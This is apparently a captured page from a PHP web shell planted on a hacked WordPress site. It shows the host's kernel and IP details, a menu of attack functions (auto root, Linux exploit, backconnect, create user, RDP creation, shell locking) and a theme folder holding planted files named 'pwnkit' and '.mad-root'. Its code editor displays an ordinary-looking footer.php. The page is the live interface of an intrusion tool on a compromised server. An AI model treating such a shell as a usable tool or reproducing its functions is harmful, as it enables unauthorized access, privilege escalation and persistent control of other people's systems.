Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
nature-one /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
799
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
868
B
-rw-r--r--
category.php
1019
B
-rw-r--r--
change_log.txt
574
B
-rw-r--r--
comments.php
3.06
KB
-rw-r--r--
content-home.php
987
B
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content-page.php
610
B
-rw-r--r--
content-single.php
1.6
KB
-rw-r--r--
content.php
4.01
KB
-rw-r--r--
editor-style.css
139
B
-rw-r--r--
footer.php
3
KB
-rw-r--r--
functions.php
11
KB
-rw-r--r--
functionsbak.php
10.51
KB
-rw-r--r--
header.php
6.17
KB
-rw-r--r--
image.php
3.81
KB
-rw-r--r--
index.php
15.05
KB
-rw-r--r--
license.txt
34.32
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
no-results.php
997
B
-rw-r--r--
options.php
28.4
KB
-rw-r--r--
page.php
1.96
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
3.12
KB
-rw-r--r--
screenshot.png
626.52
KB
-rw-r--r--
search.php
976
B
-rw-r--r--
searchform.php
678
B
-rw-r--r--
sidebar-page.php
422
B
-rw-r--r--
sidebar.php
1.03
KB
-rw-r--r--
single.php
871
B
-rw-r--r--
style.css
31.25
KB
-rw-r--r--
template-blog-post.php
1.05
KB
-rw-r--r--
template-full-width.php
1.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : footer.php
<?php /** * The template for displaying the footer. * * Contains the closing of the #content div and all content after * * @package SKT Nature One */ ?> <div id="footer"> <div class="footer-top"> <div class="middle-align"> <div class="footer-column"><h3><?php _e('About Us','nature-one'); ?></h3> <?php if( of_get_option('footertext', true) != '') { if(of_get_option('footertext',true) == 1) { _e('Lorem ipsum dolor sit amet, consectetur adipiscing elit. Curabitur egestas ornare elit ut molestie. Phasellus posuere interdum tellus, sit amet interdum lectus rutrum at. Nunc suscipit erat ut eros consequat, at bibendum sapien convallis. Donec ut gravida velit. Curabitur non ultrices lorem. Quisque aliquet leo felis, vitae posuere purus blandit vitae. Fusce vitae tincidunt enim, in efficitur justo. Morbi euismod orci non magna malesuada commodo.','nature-one'); } else { echo esc_html(of_get_option('footertext', true)); } }; ?> </div><!-- footer-column --> <div class="footer-column" style="margin-right:0;"><h3><?php _e('Clients Testimonials','nature-one'); ?></h3> <blockquote> <?php if(of_get_option('testtext',true) != 1){ echo esc_html(of_get_option('testtext', true)); } else { ?> <?php _e('Lorem ipsum dolor sit amet, consectetur adipiscing elit. Curabitur egestas ornare elit ut molestie. Phasellus posuere interdum tellus, sit amet interdum lectus rutrum at. Nunc suscipit erat ut eros consequat, at bibendum sapien convallis. Donec ut gravida velit. Curabitur non ultrices lorem. Quisque aliquet leo felis, vitae posuere purus blandit vitae.','nature-one'); ?> <?php } ?> </blockquote> </div><!-- footer-column --><div class="clear"></div> </div><!-- middle-align --> </div><!-- footer-top --> <div class="footer-bottom"> <div class="footer-inner middle-align"> <div class="footer-bottom-left"> <?php wp_nav_menu( array('theme_location' => 'footer') ); ?> <?php if( of_get_option('copytext',true) != 1) { echo esc_html(of_get_option('copytext', true)); } else { _e(' Copyright 2014 All Rights Reserved to Nature One ','nature-one'); } ; ?> </div><!-- footer-bottom-left --> <div class="footer-bottom-right"> <a href="<?php echo esc_url(SKT_URL); ?>"><?php _e('Professional WordPress Themes','nature-one'); ?>.</a> </div><!-- footer-bottom-right --><div class="clear"></div> </div><!-- footer-inner --> </div><!-- footer-bottom --> </div><!-- footer --> </div><!-- main-container --> <?php wp_footer(); ?> </body> </html>
Close